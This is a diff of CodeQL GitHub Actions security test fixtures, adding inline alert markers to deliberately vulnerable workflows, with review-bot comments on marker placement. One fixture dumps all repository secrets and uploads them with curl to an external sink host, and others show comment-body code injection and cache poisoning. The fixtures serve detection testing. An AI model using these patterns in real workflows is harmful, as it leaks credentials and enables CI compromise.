+++ b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml @@ -14,8 +14,8 @@ jobs: - uses: actions/download-artifact@v3 # SECURE - uses: actions/download-artifact@v3.0.2 # SECURE - uses: actions/download-artifact@v4.1.0 - - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 - - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE + - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 # $ Alert + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE # $ Alert - uses: actions/download-artifact@v4 # SECURE - uses: actions/download-artifact@v4.1.7 # SECURE - uses: actions/download-artifact@v4.1.8 # SECURE diff --git a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref index c9bd66e4dd06..fe1d219fbffa 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -1,2 +1,2 @@ -Security/CWE-1395/UseOfKnownVulnerableAction.ql - +query: Security/CWE-1395/UseOfKnownVulnerableAction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml index ed496f3eeb29..657204ffd536 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml @@ -13,4 +13,4 @@ jobs: with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} # $ Alert 
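Review bot: The pinned-SHA step for v3.0.2 now ends in `# SECURE # $ Alert`, so the fixture labels the step safe and expects an alert on it at the same time. If the query is known to flag this pin incorrectly, the inline-expectation form for a known false positive is `# $ SPURIOUS: Alert`; if the alert is correct, the `# SECURE` label should be dropped. The context line `actions/download-artifact@v4.1.0` carries neither a `# SECURE` label nor a marker. If that version is meant to be caught, `# $ MISSING: Alert` would record the gap; whether the query reports it is not visible in this hunk.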
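Review bot: The added ` # $ Alert` in CWE-200/test1.yml sits on a continuation line of the `args: >` folded scalar, where `#` does not start a YAML comment, so the text becomes part of the argument string. That changes the fixture's content. SecretExfiltration.expected in this same patch still records the node as ending at `16:75`, which may no longer match if that location covers the whole scalar. Consider moving the marker to a line YAML treats as a comment, or confirm that the expectations post-processor reads markers textually and regenerate the `.expected` columns. The enclosing step starts outside the hunk.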
diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 59b58e03be78..75bf3897164a 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | edges nodes | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths -#select -| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref index c750afbeaf4a..48ae5cf9646b 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-200/SecretExfiltration.ql - +query: experimental/Security/CWE-200/SecretExfiltration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml index f000ad6a287a..2ee5623b64cf 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml @@ -6,5 +6,5 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml index 6530bd5f08e0..a26e39cbda0e 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/ai-inference + - uses: actions/ai-inference # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml index 6f7844f17cb2..4db5fc755232 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - test: + test: # $ Alert name: Build and test runs-on: ubuntu-latest permissions: {} diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml index 4353c2804976..c5448530fbb9 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml 
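Review bot: In the perms2.yml hunk the `# $ Alert` marker lands on `test:`, the job that declares `permissions: {}`, while the job above it (whose start lies outside the hunk) shows no permissions block in the visible lines. Presumably the marker follows the line the alert location resolves to, but a reader will take it to mean `test` is the flagged job. A short comment next to the marker, e.g. `# alert is for the job above; the marker sits on the line its location resolves to`, would make the fixture self-explanatory. The CWE-284 test1.yml hunks, which mark `test2:` through `test8:`, look like the same pattern.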
@@ -7,6 +7,6 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml index 2824ca14a7e1..ae9514f93e67 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml @@ -8,6 +8,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - - uses: actions/jekyll-build-pages + - uses: actions/jekyll-build-pages # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml index 0ec255f0d109..85434ad03460 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/add-to-project@v2 + - uses: actions/add-to-project@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml index 1a10bd6a7d6c..137fa791353c 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/deploy-pages + - uses: actions/deploy-pages # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml index b6ae16bf9e26..8981c8663825 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/delete-package-versions + - uses: actions/delete-package-versions # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref index ad1c6a996609..6837eb5124c9 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -1,2 +1,2 @@ -Security/CWE-275/MissingActionsPermissions.ql - +query: Security/CWE-275/MissingActionsPermissions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 37eb2bddb58c..24ad2ff91c80 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -8,13 +8,13 @@ jobs: runs-on: [self-hosted, X64, Linux, 16c32g] steps: - run: cmd - test2: + test2: # $ Alert runs-on: group: my-group labels: [self-hosted, label-1] steps: - run: cmd - test3: + test3: # $ Alert runs-on: - 'self-hosted' - 'linux' @@ -22,11 +22,11 @@ jobs: - 'metal' steps: - run: echo "foo" - test4: + test4: # $ Alert runs-on: self-hosted-azure steps: - run: cmd - test5: + test5: # $ Alert strategy: fail-fast: false matrix: @@ -63,7 +63,7 @@ jobs: runs-on: ${{ matrix.os }} steps: - run: cmd - test8: + test8: # $ Alert strategy: matrix: settings: 
@@ -75,14 +75,14 @@ jobs: runs-on: ${{ matrix.settings.host }} steps: - run: cmd - test9: + test9: # $ Alert strategy: matrix: os: ${{ github.repository }} runs-on: ${{ matrix.os }} steps: - run: cmd - test10: + test10: # $ Alert strategy: matrix: os: ${{ github.repository }} @@ -91,4 +91,4 @@ jobs: baz: "asdf" runs-on: ${{ matrix.foo.bar }} steps: - - run: cmd + - run: cmd # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref index dc99068b3035..3c21812c0e7a 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref +++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql - +query: experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml index 48833460b44b..4c8aa982c31a 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -17,4 +17,4 @@ jobs: if: contains(github.event.pull_request.labels.*.name, 'safe to test') with: ref: ${{ github.event.pull_request.head.ref }} - - run: ./cmd + - run: ./cmd # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref index 09a19f21e3cb..c62fedc2e7d8 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref +++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref 
@@ -1,2 +1,2 @@ -Security/CWE-285/ImproperAccessControl.ql - +query: Security/CWE-285/ImproperAccessControl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index 473d59986957..4d09af11cfd5 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -11,7 +11,7 @@ jobs: with: name: file path: . - test2: # NOT VULNERABLE + test2: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -29,7 +29,7 @@ jobs: with: name: file path: "*" - test4: # VULNERABLE + test4: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -40,7 +40,7 @@ jobs: with: name: file path: foo - test5: # VULNERABLE + test5: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -51,7 +51,7 @@ jobs: with: name: file path: foo/* - test6: # NOT VULNERABLE + test6: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -83,5 +83,5 @@ jobs: uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 with: name: file - path: . + path: . # $ Alert[actions/secrets-in-artifacts] diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml index 614efab34c98..d476fab3ce46 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml 
@@ -9,17 +9,17 @@ jobs: TOKENS: [WRITE, READ] steps: - run: | - echo '${{ toJSON(secrets) }}' > secrets.txt + echo '${{ toJSON(secrets) }}' > secrets.txt # $ Alert[actions/excessive-secrets-exposure] curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com - env: - ALL_SECRETS: ${{ toJSON(secrets) }} + ALL_SECRETS: ${{ toJSON(secrets) }} # $ Alert[actions/excessive-secrets-exposure] run: echo "$ALL_SECRETS" - env: - SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} # $ Alert[actions/excessive-secrets-exposure] run: echo "$SOME_SECRETS" - env: - username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} - password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} # $ Alert[actions/unmasked-secret-exposure] + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} # $ Alert[actions/unmasked-secret-exposure] run: | echo "$username" echo "$password" diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref index 45f5ad80fd98..2341eea4546e 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/ExcessiveSecretsExposure.ql - +query: Security/CWE-312/ExcessiveSecretsExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref index c9bb538a12d3..ea9ad38301f2 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref 
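Review bot: The tag added to `echo '${{ toJSON(secrets) }}' > secrets.txt` sits inside a `run: |` block scalar, so `# $ Alert[actions/excessive-secrets-exposure]` becomes part of the script text rather than a YAML comment, unlike the `env:` tags in the same hunk. The shell ignores it as a comment, but the `run` value the query analyses is no longer the original string, and whether the expectations postprocess is meant to read in-scalar text is not visible from this patch. The same applies to `echo ${{ github.event.comment.body }} # $ Alert[actions/cache-poisoning/code-injection]` in code_injection1.yml. A comment on the step line would record this without shifting line numbers, e.g. `- run: | # the tag on the next line is a shell comment inside the script`.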
@@ -1,2 +1,2 @@ -Security/CWE-312/SecretsInArtifacts.ql - +query: Security/CWE-312/SecretsInArtifacts.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref index ad4c84615237..be8a489a18b4 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/UnmaskedSecretExposure.ql - +query: Security/CWE-312/UnmaskedSecretExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml index 9f19634abc92..ffd8410a1a86 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml @@ -8,5 +8,5 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo ${{ github.event.comment.body }} + echo ${{ github.event.comment.body }} # $ Alert[actions/cache-poisoning/code-injection] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml index 55efe8e9fec9..7d6556c97c05 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml @@ -15,9 +15,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml index eb6373a406eb..a6413290212a 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml @@ -11,9 +11,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml index 3849d92cbcca..85a8d067f604 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml @@ -16,9 +16,9 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml index d3f51456de2d..896c22d9243c 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml 
@@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml index ec0f9b0e6c94..1faedcf1b916 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml @@ -14,9 +14,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/cache@v2 + - uses: actions/cache@v2 # $ Source[actions/cache-poisoning/direct-cache] with: path: ./poison key: poison_key - - run: | + - run: | # $ Alert[actions/cache-poisoning/direct-cache] cat poison diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index b9652d46b59f..a17b62dbafff 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Set up Python 3.10 + - name: Set up Python 3.10 # $ Source[actions/cache-poisoning/direct-cache] uses: actions/setup-python@v5 with: python-version: "3.10" @@ -23,4 +23,4 @@ jobs: with: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} - restore-keys: ${{ runner.os }}-pip- + restore-keys: ${{ runner.os }}-pip- # $ Alert[actions/cache-poisoning/direct-cache] 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml index 05f8e4a067a1..d99592c830f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml @@ -12,9 +12,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: ./checkedout/poison + - run: ./checkedout/poison # $ Source[actions/cache-poisoning/poisonable-step] - pr-comment2: + pr-comment2: # $ Alert[actions/cache-poisoning/poisonable-step] runs-on: ubuntu-latest permissions: read-all steps: @@ -23,9 +23,9 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - uses: ./.github/actions/node-npm-setup + - uses: ./.github/actions/node-npm-setup # $ Source[actions/cache-poisoning/poisonable-step] - pr-comment3: + pr-comment3: # $ Alert[actions/cache-poisoning/poisonable-step] runs-on: ubuntu-latest permissions: read-all steps: @@ -34,4 +34,4 @@ jobs: - uses: actions/checkout@v3 with: ref: ${{ steps.comment-branch.outputs.head_sha }} - - run: node .github/actions-scripts/what-docs-early-access-branch.js + - run: node .github/actions-scripts/what-docs-early-access-branch.js # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml index 60ba26406c62..60be3c02edb0 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml 
@@ -17,11 +17,11 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] uses: actions/configure-pages@v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@v1 with: source: ./ - destination: ./_site + destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml index 8539bf2bda43..7ceb82a536f1 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -16,4 +16,4 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm run build -w www + - run: npm run build -w www # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml index 6e2351c17446..33d28c1f292d 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -15,4 +15,4 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: ./foo + - run: ./foo # $ Alert[actions/cache-poisoning/poisonable-step] Source[actions/cache-poisoning/poisonable-step] 
diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml index 9742bd01a48a..082585088b1d 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -19,10 +19,10 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Source[actions/cache-poisoning/poisonable-step] uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - name: Build with Jekyll uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ - destination: ./_site + destination: ./_site # $ Alert[actions/cache-poisoning/poisonable-step] diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index 9cfac091f675..be669230722c 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected 
@@ -1,3 +1,5 @@ +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | edges | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | nodes @@ -6,5 +8,3 @@ nodes | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref index 8ac48aad93e0..62a04c8718c8 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref 
